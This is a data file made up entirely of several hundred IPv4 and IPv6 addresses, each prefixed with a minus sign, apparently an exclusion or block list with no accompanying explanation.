-213.5.53.221 -153.126.141.155 -104.237.140.175 -23.225.0.49 -31.130.200.61 -216.70.116.50 -107.187.41.177 -108.163.181.182 -113.105.70.138 -47.89.51.70 -120.26.105.196 -150.95.185.54 -5.135.35.220 -31.220.0.139 -213.168.251.83 -121.199.40.188 -107.163.113.105 -190.106.66.69 -109.68.85.62 -153.126.201.183 -211.149.201.233 -103.229.192.248 -103.200.6.80 -133.242.181.113 -108.170.53.100 -172.246.196.162 -149.210.201.100 -58.47.240.209 -210.56.55.134 -89.208.146.237 -178.62.70.192 -209.59.185.14 -120.25.92.18 -93.155.254.136 -85.159.234.51 -178.32.190.94 -122.114.183.50 -194.19.246.10 -66.37.25.179 -109.206.173.31 -157.7.211.201 -107.165.201.219 -85.215.5.54 -54.226.98.193 -178.32.57.254 -184.95.52.35 -86.105.32.21 -217.150.94.94 -194.206.149.171 -103.12.178.5 -50.93.197.11 -134.119.86.76 -118.186.245.54 -209.200.18.244 -188.132.147.198 -103.200.32.193 -69.169.88.83 -79.98.108.163 -115.47.126.135 -167.88.148.101 -185.88.152.223 -144.217.101.201 -165.227.79.165 -103.240.16.148 -219.142.106.204 -185.66.175.205 -176.34.120.187 -113.100.14.25 -184.173.25.61 -185.129.248.71 -89.208.236.227 -79.174.71.163 -93.115.31.67 -66.254.177.72 -172.252.10.247 -67.159.39.38 -50.115.128.19 -133.242.208.140 -43.230.203.190 -104.131.143.198 -217.147.91.127 -91.191.147.127 -77.67.61.182 -59.110.173.239 -115.166.150.87 -103.240.212.168 -35.166.135.40 -95.211.224.210 -188.166.153.117 -23.230.224.91 -195.78.93.194 -18.221.2.220 -119.110.79.188 -184.172.41.109 -149.56.31.202 -1.226.200.178 -31.210.122.40 -195.189.81.155 -115.159.88.62 -27.254.146.115 -37.187.93.161 -173.236.78.93 -188.132.158.132 -52.21.2.113 -43.230.200.150 -222.90.73.245 -208.43.222.100 -184.175.106.213 -185.152.66.199 -179.190.47.163 -141.138.195.221 -221.112.96.172 -107.190.143.125 -142.4.107.213 -104.148.75.200 -153.125.234.53 -204.74.208.54 -91.226.161.82 -66.228.54.90 -106.186.29.137 -190.128.232.114 -82.135.148.221 -172.104.169.80 -116.37.88.120 -201.49.21.198 -199.87.233.59 -115.28.106.206 -207.154.220.229 -115.201.164.125 -75.101.156.16 -116.62.113.183 -37.252.96.123 -103.240.212.185 -185.10.99.48 -184.154.52.83 -37.230.99.96 -103.240.213.13 -36.79.70.156 -193.169.189.67 -144.217.70.115 -221.230.129.228 -160.16.62.169 -123.56.128.65 -5.135.118.252 -198.211.103.234 -5.178.109.196 -104.221.169.6 -198.50.176.65 -74.117.221.72 -119.23.150.211 -133.130.109.222 -74.207.244.193 -198.1.112.137 -162.247.234.252 -85.118.114.105 -133.130.113.237 -112.74.55.50 -74.206.240.39 -79.164.213.36 -199.101.134.197 -174.137.161.90 -1.180.99.170 -43.230.200.129 -23.230.224.153 -106.14.151.104 -150.95.178.117 -49.212.164.76 -188.165.104.31 -85.214.144.222 -194.19.246.100 -23.92.53.163 -2a00:1158:400:404::140 -66.63.184.149 -219.94.251.211 -123.150.244.61 -45.33.126.18 -163.172.121.123 -160.16.62.198 -142.91.232.119 -172.93.238.132 -107.179.98.98 -183.81.160.229 -62.138.137.79 -200.195.153.221 -207.35.238.52 -91.134.228.227 -121.31.117.18 -218.232.75.198 -192.188.242.107 -185.4.48.29 -118.89.21.212 -104.245.102.72 -123.59.189.132 -192.99.114.188 -119.18.217.62 -141.138.195.191 -80.84.230.28 -85.18.242.68 -185.27.52.50 -124.227.9.124 -141.138.195.248 -188.226.130.101 -222.96.47.100 -178.33.48.63 -159.148.20.99 -45.56.94.123 -185.106.21.12 -153.120.128.47 -182.48.59.63 -185.149.101.80 -43.230.203.175 -189.39.53.66 -174.139.188.109 -61.247.189.86 -162.211.94.170 -163.172.229.23 -43.230.202.236 -50.73.3.245 -150.95.174.91 -199.217.112.181 -150.95.175.184 -101.37.13.119 -211.115.86.155 -107.152.111.108 -178.18.81.26 -111.68.14.244 -142.4.119.71 -5.39.62.122 -173.214.190.4 -103.246.247.134 -172.246.196.62 -194.19.246.84 -119.23.253.230 -43.225.110.16 -107.178.162.82 -67.59.163.189 -160.16.72.143 -221.234.230.22 -167.114.131.120 -112.124.125.107 -54.179.128.186 -52.215.53.240 -203.76.124.34 -121.201.99.137 -43.230.201.107 -136.144.28.69 -2a0a:7d80:1:7::91:132 -119.23.228.226 -163.44.171.211 -192.189.25.22 -49.212.178.137 -185.89.204.7 -120.79.52.135 -103.10.120.6 -121.11.71.149 -104.207.40.161 -43.241.57.61 -142.91.95.192 -146.185.141.237 -107.186.35.111 -35.195.129.98 -64.120.123.233 -50.97.230.62 -185.38.24.19 -43.230.200.38 -52.73.112.105 -45.76.182.239 -119.23.78.144 -209.151.129.159 -211.152.37.165 -217.106.238.55 -148.251.0.254 -61.28.225.84 -120.92.237.194 -103.205.0.79 -43.230.200.82 -172.246.220.8 -120.76.244.43 -50.22.198.209 -103.240.213.40 -37.34.49.18 -34.217.126.190 -148.251.139.103 -139.59.251.107 -87.98.229.85 -5.45.73.195 -103.240.213.137 -93.187.202.65 -43.230.200.208 -133.130.117.24 -108.163.129.181 -107.6.212.188 -95.169.184.144 -103.248.253.89 -134.119.65.236 -103.200.32.146 -106.75.134.101 -67.222.4.163 -142.91.243.102 -185.200.46.170 -104.237.11.13 -217.30.184.118 -207.126.166.123 -166.62.80.162 -111.67.198.92 -23.249.168.118 -159.203.175.208 -23.154.128.9 -182.254.247.77 -212.32.250.69 -203.131.192.71 -134.119.44.248 -188.132.147.31 -173.252.197.111 -80.178.173.85 -199.101.145.12 -82.135.151.31 -142.4.28.3 -108.170.9.198 -117.78.31.26 -198.200.41.122 -116.12.56.37 -37.252.96.183 -120.78.13.28 -165.227.125.47 -101.200.211.21 -43.230.201.217 -192.99.135.44 -112.78.192.103 -128.199.67.110 -103.240.215.138 -104.203.82.19 -153.126.213.167 -137.74.154.70 -122.114.17.35 -172.246.220.24 -188.124.1.9 -178.132.2.42 -91.230.194.27 -153.121.50.38 -139.224.194.108 -218.60.28.149 -142.4.113.202 -37.97.185.109 -177.234.150.123 -114.248.148.88 -162.247.99.194 -89.163.240.214 -2400:8901::f03c:91ff:fee4:4f38 -173.255.220.140 -160.99.31.9 -107.182.230.80 -42.112.206.91 -218.201.222.187 -120.26.75.60 -222.172.147.128 -121.196.232.138 -49.212.230.151 -206.214.220.71 -219.94.244.19 -107.6.85.100 -103.37.110.160 -103.37.109.227 -46.101.137.166 -52.18.171.246 -37.59.103.146 -118.190.202.74 -153.122.35.126 -133.130.100.23 -103.42.212.138 -62.63.190.30 -43.230.201.237 -118.123.213.34 -91.109.242.248 -183.82.116.190 -43.230.201.32 -45.61.112.20 -43.230.200.198 -153.125.226.103 -107.179.95.107 -54.37.31.42 -118.68.218.31 -185.22.92.246 -116.237.15.124 -43.230.203.42 -23.110.47.252 -200.228.33.2 -71.19.249.110 -47.95.9.153 -133.242.12.129 -95.85.20.4 -45.61.113.54 -172.106.187.207 -43.230.203.55 -67.222.143.253 -31.28.169.195 -153.126.188.109 -185.10.51.167 -45.63.115.126 -204.155.31.193 -82.135.148.247 -114.215.211.163 -142.91.243.119 -123.103.113.252 -50.23.130.148 -144.217.207.170 -60.205.104.240 -69.30.211.210 -54.204.222.170 -120.92.35.99 -134.119.247.83 -156.237.177.189 -5.255.92.44 -178.132.0.66 -122.114.9.206 -121.196.192.175 -173.225.112.141 -174.139.69.141 -23.244.241.60 -66.254.175.40 -120.77.232.59 -212.48.86.206 -43.230.200.51 -185.209.139.18 -103.1.49.203 -160.16.237.100 -5.79.69.99 -153.122.57.44 -80.237.242.197 -103.90.241.1 -5.135.192.165 -104.236.150.169 -120.77.24.190 -206.217.216.82 -104.202.185.56 -45.61.112.196 -106.15.49.197 -103.198.45.58 -103.48.80.81 -52.51.136.176 -23.225.239.108 -54.64.40.255 -13.250.156.191 -43.230.200.149 -89.248.167.143 -212.68.42.27 -50.198.252.45 -172.106.186.19 -195.138.80.95 -83.149.81.137 -198.65.151.228 -184.154.216.36 -45.61.115.58 -91.198.44.111 -103.240.213.141 -5.79.65.11 -139.196.164.192 -62.213.100.238 -45.121.203.244 -174.137.164.140 -104.131.170.93 -81.19.16.105 -5.199.172.132 -153.126.194.108 -195.182.132.50 -64.120.123.247 -121.43.59.144 -103.240.213.174 -172.246.196.9 -66.55.156.146 -153.126.217.91 -58.138.174.221 -104.202.185.174 -50.28.50.165 -23.88.82.144 -155.254.18.12 -49.212.4.189 -72.249.104.14 -217.182.113.225 -84.200.29.239 -80.231.171.115 -87.118.118.75 -109.73.168.227 -207.244.96.114 -103.240.214.29 -120.26.103.208 -137.74.144.229 -107.163.113.132 -188.165.134.155 -104.232.102.159 -85.254.126.61 -104.243.139.163 -36.66.109.228 -51.15.56.113 -82.207.22.13 -103.27.178.89 -78.140.152.145 -2001:e42:107:1008::d77f:e6ee -122.9.18.164 -31.28.163.253 -101.37.164.87 -212.227.141.241 -43.230.203.167 -194.44.194.45 -194.19.246.17 -103.240.214.160 -142.91.241.69 -109.190.179.210 -5.196.92.141 -107.186.35.252 -178.33.167.255 -207.38.90.237 -2a0a:7d80:1:7::102:319 -45.34.39.245 -173.252.192.37 -114.108.172.140 -69.46.25.43 -80.233.244.56 -68.64.163.52 -166.78.0.51 -104.131.61.129 -172.246.220.202 -69.30.55.133 -150.95.143.254 -144.168.123.9 -35.170.197.186 -103.3.189.62 -208.167.252.12 -162.214.24.185 -139.59.99.1 -27.120.103.153 -122.9.22.175 -1.226.200.175 -213.251.181.58 -23.244.241.99 -150.95.175.108 -218.108.71.76 -148.243.233.9 -173.193.195.130 -85.95.241.111 -147.75.99.73 -103.240.215.179 -123.207.98.127 -101.37.170.126 -219.90.122.5 -108.61.132.227 -216.221.5.17 -194.19.246.143 -121.201.65.73 -114.207.112.35 -118.97.213.142 -120.76.142.129 -37.139.28.89 -23.238.166.188 -52.6.249.198 -37.59.235.145 -185.4.48.98 -119.29.73.19 -108.61.247.55 -103.100.157.248 -191.101.27.243 -101.99.66.169 -120.76.221.21 -23.227.189.70 -23.238.145.66 -5.145.174.176 -87.99.64.11 -212.7.8.157 -203.143.7.250 -216.17.106.24 -174.137.149.214 -150.95.156.225 -192.241.197.21 -62.63.157.144 -58.191.154.83 -178.124.131.89 -172.107.73.225 -46.105.88.207 -185.15.211.224 -172.246.220.20 -43.230.202.140 -47.89.177.148 -107.180.68.239 -198.24.163.234 -160.16.232.232 -88.214.242.116 -210.155.141.137 -37.59.45.132 -137.74.17.107 -101.201.77.16 -91.142.215.108 -172.107.71.55 -182.16.110.10 -173.193.2.132 -209.141.53.200 -104.245.102.92 -2a01:488:67:1000:523:fa83:0:1 -172.107.64.19 -150.140.136.231 -119.82.227.60 -65.18.114.100 -69.16.236.207 -172.246.196.183 -139.199.160.164 -178.32.61.43 -211.149.231.64 -107.178.150.114 -120.79.37.138 -160.124.140.181 -103.35.73.43 -46.41.151.186 -193.111.8.238 -122.13.148.74 -123.206.124.104 -62.210.36.71 -1.30.233.82 -123.57.35.195 -139.162.186.170 -103.232.87.75 -136.0.69.49 -79.137.28.17 -23.19.238.6 -212.5.51.2 -144.208.72.32 -178.32.201.89 -107.170.25.173 -112.74.187.57 -23.110.56.94 -138.197.201.209 -103.239.242.15 -52.90.218.223 -66.85.175.10 -64.64.4.40 -96.126.123.153 -192.186.173.248 -49.212.174.251 -149.255.152.40 -37.59.173.14 -216.17.111.7 -119.10.59.194 -52.23.180.158 -37.139.21.199 -142.91.239.101 -216.224.164.63 -208.92.165.3 -120.26.235.67 -46.20.11.74 -36.55.244.4 -43.230.200.100 -172.247.51.145 -98.159.40.106 -144.168.123.10 -139.5.211.26 -156.235.171.154 -23.225.0.144 -110.81.0.7 -158.69.224.39 -110.164.67.243 -69.16.206.101 -45.76.239.143 -176.31.31.250 -62.210.250.34 -72.9.152.135 -107.164.66.82 -43.230.201.214 -45.77.201.95 -50.22.221.152 -123.57.139.153 -69.10.43.44 -42.62.47.212 -199.46.124.38 -103.240.212.67 -122.9.235.224 -204.12.12.171 -216.107.153.144 -109.68.81.148 -50.28.10.160 -91.230.236.73 -91.224.194.51 -72.52.136.86 -124.6.130.134 -121.40.71.156 -88.99.27.13 -5.45.73.65 -198.199.118.192 -175.146.106.150 -104.207.40.148 -207.244.105.196 -119.6.111.35 -70.32.107.25 -185.95.2.99 -115.182.53.53 -222.175.118.213 -37.48.104.135 -195.137.160.121 -103.216.115.51 -52.44.221.125 -185.193.41.17 -182.16.32.172 -51.255.225.197 -23.19.22.62 -31.28.163.213 -62.210.201.173 -216.97.4.163 -210.211.125.180 -217.30.113.13 -120.193.206.10 -134.119.173.77 -115.29.167.83 -47.95.113.251 -5.39.25.57 -123.59.34.186 -144.217.157.173 -45.114.94.86 -150.95.141.157 -77.246.100.132 -43.230.200.203 -77.109.165.67 -119.235.24.194 -82.135.148.43 -168.1.4.119 -23.238.166.171 -185.67.2.209 -107.163.113.35 -88.150.157.243 -109.68.85.50 -101.201.211.187 -23.225.239.247 -91.121.156.227 -31.220.44.233 -45.41.92.188 -23.88.82.221 -60.162.66.92 -119.254.12.233 -106.185.40.208 -43.230.203.152 -122.114.47.95 -167.114.234.115 -68.168.111.154 -103.20.192.91 -103.250.94.228 -43.230.201.118 -5.135.118.248 -95.213.183.107 -173.236.78.75 -104.203.82.25 -172.107.71.38 -103.10.191.195 -60.205.184.80 -103.28.38.123 -23.19.237.17 -153.126.214.89 -210.59.244.150 -54.235.92.83 -62.210.30.239 -103.205.3.90 -104.148.123.28 -107.163.113.94 -109.74.13.176 -45.76.191.96 -211.154.248.34 -94.198.100.135 -125.141.142.136 -2600:3c03::f03c:91ff:feae:782f -114.113.156.6 -216.117.128.59 -43.230.202.9 -2a0a:7d80:1:7::101:4b -112.126.83.221 -47.91.226.49 -139.59.168.238 -23.238.129.125 -58.84.22.103 -2a0a:7d80:1:7::100:251 -111.230.252.50 -142.4.103.66 -128.199.251.216 -2a02:6080::1:67db:f81e -107.187.41.146 -31.28.24.129 -23.225.239.199 -209.222.20.153 -202.6.17.152 -62.63.190.47 -45.114.94.116 -141.138.195.207 -198.50.138.135 -59.110.106.219 -2a0a:7d80:1:7::102:1da -91.142.212.200 -188.165.6.89 -45.61.112.11 -122.144.133.18 -45.55.208.49 -27.254.139.195 -210.51.167.190 -89.163.133.67 -172.255.159.198 -204.93.61.57 -217.61.130.45 -209.58.140.155 -114.55.40.248 -139.162.36.123 -172.246.220.210 -149.154.71.87 -103.68.69.112 -96.44.131.156 -104.221.169.10 -66.34.169.143 -160.16.208.223 -178.33.163.116 -184.154.190.75 -211.149.247.20 -104.224.201.250 -173.252.203.192 -125.21.192.72 -211.152.61.4 -192.161.180.123 -45.114.143.14 -173.203.88.219 -114.215.24.103 -182.16.63.150 -60.10.25.112 -172.106.186.60 -219.153.12.102 -169.54.217.92 -164.132.13.126 -23.230.224.35 -172.246.220.254 -193.93.88.140 -192.249.87.91 -160.16.100.84 -166.63.126.55 -103.28.38.21 -178.170.217.5 -185.8.175.14 -123.57.153.20 -92.50.113.157 -182.92.83.11 -43.230.200.68 -81.0.235.142 -80.241.223.236 -103.240.212.242 -43.230.203.139 -5.61.43.114 -123.56.167.1 -123.207.32.177 -188.165.249.210 -139.162.169.68 -216.107.153.212 -27.154.59.58 -139.59.137.19 -27.254.146.33 -116.62.190.210 -43.230.200.64 -39.106.25.95 -176.28.2.5 -112.53.101.50 -150.242.140.9 -103.100.157.86 -123.207.154.207 -51.15.79.112 -66.254.176.72 -210.86.180.132 -118.89.109.61 -91.224.140.160 -153.126.140.6 -182.92.148.54 -172.98.197.42 -94.23.29.222 -119.81.224.145 -133.130.88.64 -119.47.89.119 -101.81.140.38 -23.224.115.164 -74.206.240.11 -169.53.13.135 -42.51.15.210 -141.105.68.170 -128.199.45.34 -120.77.203.13 -45.35.99.147 -5.189.158.83 -85.25.185.70 -77.245.48.70 -60.220.220.208 -199.15.206.133 -188.165.157.111 -2607:fcd0:100:1910::e8fd:ca35 -104.130.222.37 -139.59.132.2 -122.9.163.250 -123.234.151.171 -185.66.173.227 -95.213.149.245 -120.26.54.178 -207.20.231.28 -209.222.20.151 -66.254.161.210 -103.240.213.66 -120.76.120.252 -5.45.74.139 -67.227.201.205 -204.197.253.93 -194.19.246.137 -5.79.69.100 -120.27.27.23 -45.77.79.7 -123.60.202.253 -66.90.119.95 -101.81.255.99 -192.99.230.48 -85.25.37.72 -120.77.2.247 -188.226.149.130 -182.160.96.197 -27.118.26.26 -67.227.212.107 -194.19.246.78 -43.226.166.20 -203.195.198.104 -162.221.187.6 -78.140.187.213 -179.253.10.69 -69.42.90.198 -47.96.139.23 -162.211.182.152 -66.7.196.231 -112.121.163.14 -82.135.151.40 -23.225.239.72 -217.67.26.138 -120.24.55.235 -137.74.154.69 -103.75.188.168 -46.105.221.64 -190.5.70.253 -174.142.45.0 -43.230.200.133 -60.190.227.87 -23.225.239.161 -188.165.29.71 -37.59.89.246 -104.247.202.9 -66.228.44.21 -213.128.67.126 -185.149.101.23 -194.58.92.243 -218.205.198.54 -2a0a:7d80:1:7::97:2ac -124.56.93.18 -23.238.176.225 -192.154.103.93 -27.254.146.22 -153.126.189.245 -134.119.166.139 -31.42.48.12 -212.9.96.91 -188.165.30.118 -139.196.4.251 -118.119.14.161 -27.133.137.236 -104.203.82.166 -123.206.7.56 -173.233.72.113 -91.221.206.22 -46.249.199.56 -149.202.111.156 -103.240.214.112 -2a0a:7d80:1:7::102:37b -123.207.101.42 -5.39.219.83 -173.193.149.111 -157.119.233.135 -107.190.135.156 -111.67.198.156 -94.23.95.165 -86.109.170.25 -163.172.251.181 -192.3.165.161 -103.205.3.68 -172.106.186.12 -219.132.141.238 -95.85.49.50 -174.37.174.84 -114.141.255.245 -119.42.148.238 -95.47.161.64 -5.45.74.85 -188.165.129.165 -116.62.146.83 -91.134.135.96 -104.168.143.85 -103.37.85.25 -144.168.123.14 -113.93.240.68 -118.190.106.182 -112.74.33.133 -178.79.159.195 -107.178.162.120 -217.11.68.164 -116.62.27.48 -59.153.61.190 -121.42.180.75 -85.254.126.60 -23.238.129.89 -103.66.104.15 -111.90.159.50 -43.230.203.36 -176.28.2.1 -45.125.216.228 -207.148.75.72 -43.230.203.28 -89.208.236.205 -156.235.170.112 -202.146.208.189 -150.242.58.162 -195.181.242.119 -192.165.36.197 -199.241.188.162 -209.141.53.240 -202.153.128.58 -192.154.97.98 -66.212.31.78 -103.212.34.193 -153.126.217.113 -185.89.204.10 -178.18.91.164 -23.110.61.93 -45.77.37.194 -107.180.69.87 -192.154.100.42 -209.95.44.100 -153.122.12.18 -103.6.86.102 -167.114.1.42 -46.166.161.206 -213.143.80.132 -212.83.141.8 -103.240.214.133 -23.250.115.125 -153.120.179.80 -163.172.91.85 -120.132.38.29 -104.202.185.91 -74.117.221.80 -160.16.218.207 -222.239.93.111 -2600:3c03::f03c:91ff:fedf:e904 -103.240.213.241 -123.57.31.193 -199.231.86.2 -194.19.246.75 -45.55.113.126 -91.232.105.124 -103.240.213.68 -23.19.22.48 -27.254.146.8 -149.62.172.101 -2001:4800:7818:103:be76:4eff:fe04:b15c -98.124.176.211 -195.154.226.183 -139.59.114.53 -216.107.153.236 -23.237.64.125 -5.178.109.36 -2001:4800:7818:103:be76:4eff:fe04:7dcd -2a01:7e00::f03c:91ff:fec8:463d -103.27.236.140 -209.141.48.107 -104.245.102.38 -74.206.240.8 -185.65.200.188 -159.148.37.125 -199.231.184.245 -109.235.69.224 -203.171.227.82 -172.252.10.52 -107.163.113.167 -67.229.163.99 -37.59.132.94 -124.24.58.209 -46.105.221.71 -45.252.248.238 -23.230.224.228 -178.34.153.11 -138.197.201.204 -188.93.23.92 -83.98.197.88 -5.39.41.202 -193.106.218.6 -79.98.27.146 -154.0.172.53 -211.149.217.15 -202.103.219.2 -216.117.156.38 -103.12.51.43 -49.212.31.137 -192.241.71.10 -103.230.120.249 -133.242.22.94 -138.128.120.125 -120.27.128.70 -59.188.231.28 -185.23.26.69 -37.153.111.179 -47.89.47.30 -103.215.6.19 -27.133.241.133 -134.119.160.239 -59.110.4.206 -23.88.82.86 -80.77.95.3 -188.226.215.34 -128.199.107.198 -79.98.104.35 -209.141.62.76 -178.33.185.30 -142.4.215.91 -23.104.135.200 -23.225.0.179 -118.89.18.126 -206.190.150.176 -169.54.224.4 -217.23.15.211 -185.2.102.191 -185.162.128.75 -42.62.3.144 -86.104.177.100 -178.62.185.200 -213.238.161.77 -120.76.73.70 -121.201.50.180 -31.24.40.194 -216.107.153.133 -94.126.170.91 -125.76.225.239 -106.120.213.199 -120.77.37.187 -103.100.157.238 -192.186.143.245 -177.125.27.99 -174.137.161.80 -23.224.115.64 -144.217.139.38 -74.206.240.15 -74.208.43.216 -83.169.199.166 -172.107.146.144 -128.199.176.57 -46.101.35.101 -103.240.213.26 -115.159.87.33 -122.9.235.200 -192.241.251.84 -217.23.11.250 -103.240.214.192 -107.164.66.217 -36.32.232.15 -31.31.199.233 -5.135.166.204 -91.134.151.94 -198.50.199.246 -35.154.38.147 -113.23.214.73 -219.94.167.85 -169.53.183.101 -219.129.216.28 -104.207.52.80 -52.202.193.229 -184.107.98.94 -43.230.200.89 -5.178.109.105 -121.43.119.235 -117.21.173.49 -54.175.100.219 -173.212.236.166 -104.203.82.117 -103.249.106.193 -217.150.94.97 -123.57.24.101 -173.193.49.70 -23.236.100.8 -42.121.7.98 -139.199.9.203 -62.213.100.241 -172.246.196.220 -54.236.24.88 -204.74.219.132 -27.254.146.212 -5.250.179.173 -173.252.197.112 -139.129.167.30 -200.123.0.34 -116.7.237.123 -139.129.167.70 -172.246.220.92 -45.55.204.35 -104.209.177.146 -188.120.238.220 -42.117.2.173 -79.137.28.23 -80.94.164.139 -185.147.80.51 -202.146.219.13 -64.19.77.26 -112.126.93.144 -88.208.238.195 -185.20.12.20 -103.240.212.40 -74.80.175.226 -173.255.253.108 -50.28.8.130 -104.202.185.229 -104.168.168.38 -208.38.172.53 -98.126.158.156 -122.114.43.206 -94.23.95.163 -106.80.155.8 -202.105.232.14 -120.55.80.52 -153.121.72.58 -83.169.7.58 -69.87.198.124 -107.187.41.218 -43.230.203.17 -128.14.85.157 -106.2.193.76 -123.57.158.230 -69.64.58.117 -172.104.36.63 -122.9.229.174 -138.68.55.127 -80.233.244.54 -14.104.82.220 -217.160.182.212 -18.231.131.134 -153.126.194.131 -45.114.94.163 -104.202.185.238 -128.199.100.55 -192.241.227.71 -45.79.6.214 -125.88.168.52 -202.164.21.33 -5.189.191.107 -120.79.6.71 -173.252.246.228 -91.224.194.214 -69.10.37.190 -103.35.202.113 -212.68.42.17 -216.107.153.136 -192.155.227.75 -27.120.105.33 -14.18.207.113 -153.126.157.181 -77.223.129.28 -217.114.172.29 -202.10.32.66 -122.114.42.71 -110.249.214.178 -43.230.201.56 -192.241.142.197 -43.242.33.148 -103.37.160.54 -43.225.36.38 -170.75.251.44 -120.25.205.212 -67.225.236.57 -122.9.29.216 -180.149.245.144 -178.32.215.142 -113.116.148.11 -2a01:4f8:151:31b1::2 -82.146.36.36 -193.151.90.75 -122.114.88.55 -31.28.163.216 -61.4.83.87 -178.216.248.243 -104.168.141.241 -188.166.11.107 -193.111.114.9 -35.154.159.137 -103.98.72.18 -139.162.44.133 -182.92.185.230 -134.119.71.62 -120.27.135.169 -69.12.68.35 -125.212.250.140 -176.223.198.10 -185.122.140.40 -2600:3c01::f03c:91ff:fedf:14c0 -203.125.93.57 -125.212.220.209 -104.149.66.166 -27.133.240.73 -61.183.155.52 -208.99.86.130 -107.163.113.15 -192.154.97.99 -180.131.137.182 -138.197.206.11 -5.44.154.10 -156.237.178.134 -208.83.63.210 -173.236.78.77 -104.202.185.188 -79.98.108.154 -137.118.22.141 -120.76.154.188 -43.230.202.98 -64.120.123.243 -43.230.202.212 -43.230.201.184 -118.184.30.143 -23.225.0.112 -60.28.24.203 -66.254.175.43 -176.222.190.71 -218.25.10.137 -111.67.198.99 -27.133.136.168 -188.116.2.179 -202.107.229.134 -91.230.194.66 -140.143.87.205 -188.226.176.206 -209.188.18.25 -122.200.145.244 -23.104.135.161 -69.50.206.22 -45.61.114.49 -23.238.166.131 -193.151.90.93 -122.9.235.236 -134.119.25.241 -107.163.113.181 -173.252.194.129 -125.19.39.36 -70.36.125.54 -103.12.50.13 -107.164.66.46 -160.16.206.206 -192.99.44.87 -45.55.116.194 -64.207.184.48 -163.44.164.224 -119.10.8.69 -95.85.61.144 -223.223.188.213 -156.235.171.61 -45.58.115.114 -185.45.74.110 -43.230.200.171 -116.90.86.28 -88.99.101.163 -159.203.240.241 -122.224.149.34 -104.232.102.185 -147.135.129.229 -49.212.182.177 -198.202.88.97 -133.130.110.109 -67.205.172.130 -45.118.132.174 -149.202.87.12 -103.205.1.126 -178.33.92.193 -89.207.146.130 -31.28.163.210 -95.85.44.145 -185.116.215.113 -103.25.192.210 -114.215.136.21 -5.178.109.165 -120.136.40.217 -51.15.223.138 -103.240.212.130 -178.238.58.187 -37.59.138.232 -43.230.200.205 -123.207.67.236 -176.58.124.189 -146.185.135.229 -149.202.153.10 -139.59.98.131 -112.124.124.32 -93.191.129.131 -103.224.241.43 -185.37.226.217 -62.100.207.135 -165.227.26.19 -52.52.82.178 -52.210.81.203 -89.185.234.11 -162.243.194.22 -201.55.38.17 -47.104.61.116 -176.58.126.22 -172.107.71.58 -156.235.169.183 -66.55.156.131 -43.243.249.43 -119.23.29.217 -172.252.10.64 -109.168.111.151 -23.88.82.183 -69.61.127.202 -208.94.110.24 -172.107.75.203 -66.180.198.90 -31.28.25.32 -45.41.92.178 -121.40.250.82 -172.104.29.120 -173.192.108.122 -116.196.117.148 -200.252.68.200 -27.254.146.101 -162.248.208.196 -80.93.26.228 -178.32.190.91 -103.28.38.190 -159.148.20.122 -89.33.247.15 -172.246.196.103 -107.190.232.76 -109.203.103.83 -202.171.225.141 -176.31.54.147 -188.165.32.169 -5.250.245.104 -123.56.75.159 -54.37.190.34 -111.223.254.19 -104.245.102.50 -74.127.45.153 -35.194.194.251 -108.170.59.204 -72.14.187.232 -45.32.185.232 -172.247.51.40 -139.199.153.49 -128.199.218.148 -123.57.138.117 -167.249.11.34 -149.154.71.109 -92.63.110.7 -89.25.164.105 -172.247.51.82 -91.121.112.142 -2600:3c00::f03c:91ff:fea8:7034 -185.91.108.184 -112.124.113.155 -45.79.181.190 -107.163.113.3 -162.144.115.6 -74.82.163.53 -103.193.241.132 -192.227.232.201 -124.243.223.49 -185.66.175.98 -2600:3c03::f03c:91ff:fea8:3244 -77.81.104.189 -118.89.40.102 -103.240.213.118 -134.119.175.82 -173.252.249.183 -142.44.139.33 -138.68.71.168 -65.60.5.114 -217.18.43.67 -116.197.131.166 -123.56.165.162 -188.226.179.217 -67.205.134.12 -23.238.166.143 -31.220.54.88 -37.59.146.79 -142.91.241.112 -43.230.201.250 -121.52.217.113 -137.74.17.69 -142.4.15.224 -72.10.51.250 -60.190.213.2 -5.189.156.191 -158.69.149.24 -91.229.174.102 -37.57.179.45 -118.190.102.99 -96.44.179.254 -142.91.243.120 -213.189.63.231 -103.240.212.157 -213.163.72.166 -5.189.182.232 -31.169.92.10 -185.35.164.85 -64.64.99.34 -23.238.176.251 -103.43.71.117 -138.68.57.171 -173.252.197.105 -99.192.185.184 -209.200.43.182 -220.135.114.171 -50.22.197.220 -123.59.101.76 -209.126.122.58 -212.68.46.235 -118.193.219.43 -123.56.9.90 -142.91.232.108 -60.12.201.190 -178.20.224.102 -82.202.216.155 -23.104.135.106 -120.25.220.166 -211.152.37.21 -115.60.232.129 -209.152.162.248 -114.67.69.225 -60.10.198.246 -23.19.202.41 -103.74.121.189 -104.236.217.27 -66.254.177.75 -217.18.43.141 -123.206.216.240 -156.235.172.77 -204.74.208.234 -172.255.173.140 -103.15.144.11 -189.36.38.219 -149.56.99.221 -160.16.63.29 -107.178.149.93 -58.58.176.34 -200.216.193.188 -172.246.196.227 -139.59.255.205 -23.224.115.167 -104.149.66.133 -50.2.188.221 -23.230.224.67 -50.115.137.37 -185.104.28.43 -195.154.50.36 -43.230.202.2 -123.56.244.50 -103.230.120.252 -104.202.185.114 -192.169.216.131 -67.229.58.230 -169.54.224.13 -158.69.131.213 -66.70.223.67 -45.55.245.101 -172.246.220.219 -46.101.121.251 -37.153.89.49 -192.241.177.212 -31.210.88.165 -72.249.182.51 -104.202.185.108 -104.192.84.39 -82.135.151.249 -218.104.83.221 -176.31.129.176 -175.45.185.209 -171.244.8.149 -109.190.102.141 -82.223.36.233 -104.202.185.81 -120.76.24.86 -192.169.197.81 -142.4.204.196 -120.92.232.246 -212.158.128.87 -64.37.54.144 -178.62.9.99 -205.147.97.138 -114.215.29.237 -41.77.199.14 -118.190.70.114 -106.185.38.7 -5.178.109.7 -108.59.8.53 -209.200.13.171 -182.16.124.11 -199.119.78.60 -178.32.76.169 -209.53.155.212 -121.41.110.188 -165.227.150.50 -199.217.119.239 -185.177.153.246 -172.246.196.71 -65.49.9.79 -23.230.224.81 -120.76.41.74 -156.235.170.113 -139.199.57.218 -208.94.238.39 -187.109.32.203 -211.149.161.158 -198.50.234.144 -120.27.162.216 -153.120.73.29 -23.239.12.115 -45.114.118.209 -37.34.48.101 -150.95.132.200 -103.24.175.237 -103.205.2.78 -163.172.113.235 -66.228.47.95 -153.122.5.131 -23.230.224.137 -156.235.170.8 -185.122.140.75 -150.95.147.229 -103.12.51.14 -212.83.161.24 -103.92.104.36 -111.207.45.112 -163.172.57.24 -182.92.174.193 -193.150.102.9 -64.237.35.214 -82.223.31.169 -153.36.242.24 -43.230.200.106 